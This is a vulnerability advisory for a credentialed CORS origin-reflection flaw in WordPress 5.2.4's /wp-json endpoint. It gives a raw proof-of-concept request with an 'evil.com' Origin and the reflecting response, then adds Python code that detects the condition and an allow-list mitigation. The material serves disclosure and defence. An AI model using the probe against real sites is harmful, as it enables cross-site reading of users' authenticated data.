WordPress 5.2.4 Cross Origin Resource Sharing

Risk: Low
Local: No
Remote: Yes

# Exploit Title: WordPress 5.2.4 - Cross-Origin Resource Sharing
# Date: 2019-10-28
# Exploit Author: Milad Khoshdel
# Software Link: https://wordpress.org/download/
# Version: WordPress 5.2.4
# Tested on: Linux Apache/2 PHP/7.2
# Vulnerable Page: https://[Your-Domain]/wp-json

# POC:
# The web application fails to properly validate the Origin header (check Details section for more information)
# and returns the header Access-Control-Allow-Credentials: true. In this configuration any website can issue
# requests made with user credentials and read the responses to these requests. Trusting arbitrary
# origins effectively disables the same-origin policy, allowing two-way interaction by third-party web sites.

# REQUEST -->

GET /wp-json/ HTTP/1.1
Origin: https://www.evil.com
Accept: */*
Accept-Encoding: gzip,deflate
Host: [Your-Domain]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Connection: Keep-alive

# RESPONSE -->

HTTP/1.1 200 OK
Date: Mon, 28 Oct 2019 07:34:39 GMT
Server: NopeJS
X-Robots-Tag: noindex
Link: <https://[Your-Domain].com/wp-json/>; rel="https://api.w.org/"
X-Content-Type-Options: nosniff
Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages
Access-Control-Allow-Headers: Authorization, Content-Type
Allow: GET
Access-Control-Allow-Origin: https://www.evil.com
Access-Control-Allow-Methods: OPTIONS, GET, POST, PUT, PATCH, DELETE
Access-Control-Allow-Credentials: true
Vary: Origin,Accept-Encoding,User-Agent
Keep-Alive: timeout=2, max=73
Connection: Keep-Alive
Content-Type: application/json; charset=UTF-8
Original-Content-Encoding: gzip
Content-Length: 158412
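The condition the advisory describes is the combination of an echoed, untrusted Origin with Access-Control-Allow-Credentials: true. The following is an added example, not part of the advisory or of WordPress: a small checker that parses a raw response head and classifies its CORS exposure, plus the allow-list logic a hardened endpoint should use instead of reflection. The sample headers are a constructed, reduced copy of the response above; the function names are my own.

```python
from typing import Dict, FrozenSet

# Constructed sample: a reduced copy of the advisory's response headers, as returned
# for a request that carried "Origin: https://www.evil.com" (the page's test value).
SAMPLE_RESPONSE = """HTTP/1.1 200 OK
X-Content-Type-Options: nosniff
Access-Control-Allow-Origin: https://www.evil.com
Access-Control-Allow-Methods: OPTIONS, GET, POST, PUT, PATCH, DELETE
Access-Control-Allow-Credentials: true
Vary: Origin,Accept-Encoding,User-Agent
Content-Type: application/json; charset=UTF-8
"""

def parse_headers(raw: str) -> Dict[str, str]:
    """Parse a raw HTTP response head into a dict keyed by lower-cased header name."""
    headers: Dict[str, str] = {}
    for line in raw.splitlines()[1:]:  # skip the status line
        if not line.strip():
            break  # blank line ends the header block
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers

def assess_cors(raw_response: str, sent_origin: str,
                trusted: FrozenSet[str] = frozenset()) -> str:
    """Classify the CORS exposure of a response to a request that sent `sent_origin`:
    'credentialed-reflection' = untrusted Origin echoed AND Allow-Credentials: true (the
    advisory's condition: cross-site reads with the victim's cookies); 'reflection' =
    echoed without credentials; 'wildcard' = '*' (browsers refuse credentials for it);
    'restricted' = no Allow-Origin header, or only an allow-listed origin is echoed."""
    h = parse_headers(raw_response)
    acao = h.get("access-control-allow-origin")
    creds = h.get("access-control-allow-credentials", "").lower() == "true"
    if acao is None:
        return "restricted"
    if acao == "*":
        return "wildcard"
    if acao == sent_origin and sent_origin not in trusted:
        return "credentialed-reflection" if creds else "reflection"
    return "restricted"

def hardened_cors_headers(request_origin: str, allow_list: FrozenSet[str]) -> Dict[str, str]:
    """Mitigation: echo the Origin only when it is on an explicit allow list, otherwise send
    no CORS headers so the browser enforces the same-origin policy; Vary: Origin keeps a
    cache from replaying one origin's allow header to another."""
    if request_origin not in allow_list:
        return {}
    return {"Access-Control-Allow-Origin": request_origin,
            "Access-Control-Allow-Credentials": "true",
            "Vary": "Origin"}
```

Running `assess_cors(SAMPLE_RESPONSE, "https://www.evil.com")` on the advisory's headers yields "credentialed-reflection"; the same headers with the origin on the trusted set classify as "restricted".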

